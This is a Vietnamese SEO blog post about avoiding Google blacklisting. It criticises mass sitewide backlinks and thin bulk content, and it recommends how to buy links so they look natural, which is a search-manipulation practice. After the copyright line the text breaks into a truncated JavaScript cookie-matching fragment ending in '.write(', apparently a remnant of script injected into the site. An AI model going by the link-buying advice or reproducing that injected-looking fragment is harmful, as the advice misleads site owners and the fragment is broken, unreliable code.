Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > SEO > Những lưu ý trong quá trình SEO

Những lưu ý trong quá trình SEO

Dạo gần đây tôi thấy trên internet nói chung và cộng đồng SEO nói riêng có nhiều tin tức cũng như bài viết về công ty N#V# làm SEO cho khách hàng một cách cẩu thả, làm website bị google cho vào Black list và khó có thể phục hồi. Một vấn đề mà trong nhiều bài viết trước tôi chưa đề cập tới là SEO thế nào cho đúng để tránh bị cho vào Black list của google. Và bài viết này tôi sẽ nói về việc SEO đúng cách.

thiết kế website

I. SEO Offpage.

– SEO offpage là việc đặt link của landing page mà ta muốn seo vào các website khác, vấn đề là đặt sao cho đúng và hiệu quả nhất. Như truyện về công ty N#V#, họ có hàng trăm website phụ, số index trên các website này trung bình từ 1600 đến trên 10 000 hoặc hơn nữa. Dịch vụ seo của họ có thể đẩy từ khóa của khách hàng vào top 10 trong vòng 10 phút bằng việc đặt link ở all page của các trang phụ này (có thể là footer, slide bar …). Việc đặt link này làm số lượng link trỏ về tăng đột biến, có thể lên tới 1 triệu link. Vì khi đặt ở all page thì tất cả số index của các web phụ sẽ có link trỏ về. Sự tăng đột ngột link trỏ về sẽ không tránh khỏi việc giám sát bằng thuật toán của google. Nhẹ thì landing page đó sẽ bị ban, nặng thì cả domain của website đó bị vào Sand box và không thể nào lên hạng được.

– Từ những điều trên ta thấy việc mua link ở chân trang, side bar để làm SEO chưa chắc đã có lợi cho việc SEO website, đôi khi nó còn gây hại rất nhiều.  Một số cách mua link hiệu quả:

+ Chọn các website có PR cao, từ 3 trở lên.

+ Website đứng trong top 3 triệu của alexa.

+ Ở tất cả các trang của website đó phải có số link out dưới 100.

+ Không nên mua link của nhiều website cùng lúc.

+ Khi nội lực website của bạn đã mạnh thì mới nên mua link.

II. SEO onpage.

– Nhiều người có quan điểm sai lầm là việc website có càng nhiều bài viết (hay index) thì càng có lợi cho SEO, thực tế điều đó là một suy nghĩ sai lầm. Chất lượng website được đánh giá dựa trên nhiều yếu tố. Nhiều người khi tiến hành SEO thì chỉ quan tâm đến việc tạo ra số lượng bài viết mà không quan tâm đến chất lượng bài viết. Điều đó làm tăng các chỉ số xấu như: số lượt người dùng thoát ngay, tỉ lệ % bị đánh giá là copy bài viết. Với thuật toán “Chim cánh cụt” hiện nay thì điều đó mang tác động rất xấu.

– Nhiều người làm SEO muốn có kết quả nhanh chóng nên sử dụng một số tools tạo ra một lượng index lớn bất thường lên đến vài ngàn hoặc vài trăm ngàn index mà nội lực của website chưa mạnh. Điều đó cũng sẽ làm google soi website kĩ hơn và việc vào black list hoặc bị phạt là rất lớn. Một số lưu ý khi bạn làm SEO offpage:

+ Tự tạo nội dung có chất lượng cho chính website của mình và đáp ứng nhu cầu người dùng.

+ Tối ưu bài viết theo chuẩn SEO.

+ Tối ưu website theo chuẩn SEO.

+ Viết bài đều đặn.

+ Backup website đều đặn, tìm và diệt virus ngay khi có thông báo của Webmaster tool.

 Trong bài viết này các bạn cũng có thể chia sẻ các khó khăn gặp phải trong quá trình SEO, tôi sẽ tư vấn cách giải quyết cho bạn.

Bản quyền thuộc http://pridio.com

(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘